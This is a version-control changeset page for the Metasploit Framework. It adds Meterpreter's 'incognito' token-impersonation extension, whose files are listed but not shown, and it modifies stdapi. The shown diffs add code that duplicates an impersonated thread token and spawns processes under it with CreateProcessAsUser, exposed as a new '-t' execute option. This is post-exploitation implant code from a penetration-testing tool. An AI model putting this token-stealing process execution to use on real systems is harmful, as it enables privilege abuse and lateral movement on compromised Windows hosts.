Changeset 5499
- Timestamp:
- 04/28/08 11:57:49 (2 weeks ago)
- Files:
-
- framework3/trunk/data/meterpreter/ext_server_incognito.dll (added)
- framework3/trunk/data/meterpreter/ext_server_stdapi.dll (modified) (previous)
- framework3/trunk/data/msfweb/app/models/exploit.rb (modified) (1 diff)
- framework3/trunk/external/source/meterpreter/source/common/core.c (modified) (1 diff)
- framework3/trunk/external/source/meterpreter/source/extensions/incognito (added)
- framework3/trunk/external/source/meterpreter/source/extensions/incognito/hash_stealer.c (added)
- framework3/trunk/external/source/meterpreter/source/extensions/incognito/hash_stealer.h (added)
- framework3/trunk/external/source/meterpreter/source/extensions/incognito/incognito.c (added)
- framework3/trunk/external/source/meterpreter/source/extensions/incognito/incognito.h (added)
- framework3/trunk/external/source/meterpreter/source/extensions/incognito/list_tokens.c (added)
- framework3/trunk/external/source/meterpreter/source/extensions/incognito/list_tokens.h (added)
- framework3/trunk/external/source/meterpreter/source/extensions/incognito/token_info.c (added)
- framework3/trunk/external/source/meterpreter/source/extensions/incognito/token_info.h (added)
- framework3/trunk/external/source/meterpreter/source/extensions/incognito/user_management.c (added)
- framework3/trunk/external/source/meterpreter/source/extensions/incognito/user_management.h (added)
- framework3/trunk/external/source/meterpreter/source/extensions/stdapi/server/sys/config/config.c (modified) (3 diffs)
- framework3/trunk/external/source/meterpreter/source/extensions/stdapi/server/sys/process/process.c (modified) (2 diffs)
- framework3/trunk/external/source/meterpreter/source/extensions/stdapi/stdapi.h (modified) (1 diff)
- framework3/trunk/external/source/meterpreter/source/server/libloader.c (modified) (2 diffs)
- framework3/trunk/lib/rex/post/meterpreter/extensions/incognito (added)
- framework3/trunk/lib/rex/post/meterpreter/extensions/incognito/incognito.rb (added)
- framework3/trunk/lib/rex/post/meterpreter/extensions/incognito/tlv.rb (added)
- framework3/trunk/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb (modified) (1 diff)
- framework3/trunk/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb (modified) (1 diff)
- framework3/trunk/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb (added)
- framework3/trunk/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb (modified) (4 diffs)
Legend:
- Unmodified
- Added
- Removed
- Modified
- Copied
- Moved
framework3/trunk/data/msfweb/app/models/exploit.rb
r3980 r5499 2 2 def self.find_all() 3 3 mods = [] 4 $msframework.exploits.each_module { |n,m| mods << m.new}4 $msframework.exploits.each_module { |n,m| mods << $msframework.exploits.create(n) } 5 5 mods 6 6 end framework3/trunk/external/source/meterpreter/source/common/core.c
r4746 r5499 78 78 break; 79 79 80 memset(packet, 0, sizeof( Packet));80 memset(packet, 0, sizeof(packet)); 81 81 82 82 // Initialize the header length and message type framework3/trunk/external/source/meterpreter/source/extensions/stdapi/server/sys/config/config.c
r4603 r5499 11 11 Packet *response = packet_create_response(packet); 12 12 DWORD res = ERROR_SUCCESS; 13 CHAR username[512]; 14 DWORD size = sizeof(username); 13 CHAR username[512], username_only[512], domainname_only[512]; 14 LPVOID TokenUserInfo[4096]; 15 HANDLE token; 16 DWORD user_length = sizeof(username_only), domain_length = sizeof(domainname_only); 17 DWORD size = sizeof(username), sid_type = 0, returned_tokinfo_length; 15 18 16 19 memset(username, 0, sizeof(username)); 20 memset(username_only, 0, sizeof(username_only)); 21 memset(domainname_only, 0, sizeof(domainname_only)); 17 22 18 23 do 19 24 { 20 // Get the username 21 if (!GetUserName(username, &size)) 25 if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &token)) 26 OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token); 27 28 if (!GetTokenInformation(token, TokenUser, TokenUserInfo, 4096, &returned_tokinfo_length)) 22 29 { 23 30 res = GetLastError(); 24 31 break; 25 32 } 33 34 if (!LookupAccountSidA(NULL, ((TOKEN_USER*)TokenUserInfo)->User.Sid, username_only, &user_length, domainname_only, &domain_length, (PSID_NAME_USE)&sid_type)) 35 { 36 res = GetLastError(); 37 break; 38 } 39 40 // Make full name in DOMAIN\USERNAME format 41 _snprintf(username, 512, "%s\\%s", domainname_only, username_only); 42 username[511] = '\0'; 26 43 27 44 packet_add_tlv_string(response, TLV_TYPE_USER_NAME, username); … … 86 103 osName = "Windows NT 4.0"; 87 104 } 88 else if (v.dwMajorVersion == 5)105 else 89 106 { 90 107 if (v.dwMinorVersion == 0) … … 94 111 else if (v.dwMinorVersion == 2) 95 112 osName = "Windows .NET Server"; 96 }97 else if (v.dwMajorVersion == 6)98 {99 if (v.dwMinorVersion == 0)100 osName = "Windows Vista";101 113 } 102 114 framework3/trunk/external/source/meterpreter/source/extensions/stdapi/server/sys/process/process.c
r2814 r5499 92 92 Tlv inMemoryData; 93 93 BOOL doInMemory = FALSE; 94 HANDLE token, pToken; 94 95 95 96 // Initialize the startup information … … 227 228 createFlags |= CREATE_SUSPENDED; 228 229 229 // Try to execute the process 230 if (!CreateProcess(NULL, commandLine, NULL, NULL, inherit, 231 createFlags, NULL, NULL, &si, &pi)) 232 { 233 result = GetLastError(); 234 break; 230 if (flags & PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN) 231 { 232 // If there is a thread token use that, otherwise use current process token 233 if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &token)) 234 OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token); 235 236 // Duplicate to make primary token (try delegation first) 237 if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, TokenPrimary, &pToken)) 238 if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &pToken)) 239 { 240 result = GetLastError(); 241 break; 242 } 243 244 // Try to execute the process with duplicated token 245 if (!CreateProcessAsUser(pToken, NULL, commandLine, NULL, NULL, inherit, 246 createFlags, NULL, NULL, &si, &pi)) 247 { 248 result = GetLastError(); 249 break; 250 } 251 } 252 else 253 { 254 // Try to execute the process 255 if (!CreateProcess(NULL, commandLine, NULL, NULL, inherit, 256 createFlags, NULL, NULL, &si, &pi)) 257 { 258 result = GetLastError(); 259 break; 260 } 235 261 } 236 262 framework3/trunk/external/source/meterpreter/source/extensions/stdapi/stdapi.h
r2815 r5499 67 67 #define PROCESS_EXECUTE_FLAG_CHANNELIZED (1 << 1) 68 68 #define PROCESS_EXECUTE_FLAG_SUSPENDED (1 << 2) 69 #define PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN (1 << 3) 69 70 70 71 #define TLV_TYPE_BASE_ADDRESS \ framework3/trunk/external/source/meterpreter/source/server/libloader.c
r4725 r5499 542 542 { 543 543 LPCSTR shortName = name, slash = NULL; 544 SHELLCODE_CTX *lctx;544 SHELLCODE_CTX lctx; 545 545 HMODULE mod = NULL; 546 547 lctx = (SHELLCODE_CTX *)VirtualAlloc(NULL, sizeof(SHELLCODE_CTX), MEM_COMMIT, PAGE_EXECUTE_READWRITE);548 549 if (!lctx)550 return NULL;551 546 552 547 if ((slash = strrchr(name, '\\'))) 553 548 shortName = slash+1; 554 549 555 memset( lctx, 0, sizeof(SHELLCODE_CTX));556 557 ctx = lctx;550 memset(&lctx, 0, sizeof(lctx)); 551 552 ctx = &lctx; 558 553 559 554 install_hooks(ctx); … … 579 574 remove_hooks(ctx); 580 575 581 VirtualFree(lctx, sizeof(SHELLCODE_CTX), MEM_RELEASE);582 583 576 ctx = NULL; 584 577 framework3/trunk/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
r3242 r5499 128 128 if (opts['Suspended']) 129 129 flags |= PROCESS_EXECUTE_FLAG_SUSPENDED 130 end 131 if (opts['UseThreadToken']) 132 flags |= PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN 130 133 end 131 134 framework3/trunk/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
r3242 r5499 70 70 PROCESS_EXECUTE_FLAG_CHANNELIZED = (1 << 1) 71 71 PROCESS_EXECUTE_FLAG_SUSPENDED = (1 << 2) 72 PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN = (1 << 3) 72 73 73 74 # Registry framework3/trunk/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
r3804 r5499 28 28 "-i" => [ false, "Interact with the process after creating it." ], 29 29 "-m" => [ false, "Execute from memory." ], 30 "-d" => [ true, "The 'dummy' executable to launch when using -m." ]) 30 "-d" => [ true, "The 'dummy' executable to launch when using -m." ], 31 "-t" => [ false, "Execute process with currently impersonated thread token"]) 31 32 32 33 # … … 80 81 cmd_args = nil 81 82 cmd_exec = nil 83 use_thread_token = false 82 84 83 85 @@execute_opts.parse(args) { |opt, idx, val| … … 104 106 channelized = true 105 107 interact = true 108 when "-t" 109 use_thread_token = true 106 110 end 107 111 } … … 117 121 'Channelized' => channelized, 118 122 'Hidden' => hidden, 119 'InMemory' => (from_mem) ? dummy_exec : nil) 123 'InMemory' => (from_mem) ? dummy_exec : nil, 124 'UseThreadToken' => use_thread_token) 120 125 121 126 print_line("Process #{p.pid} created.")
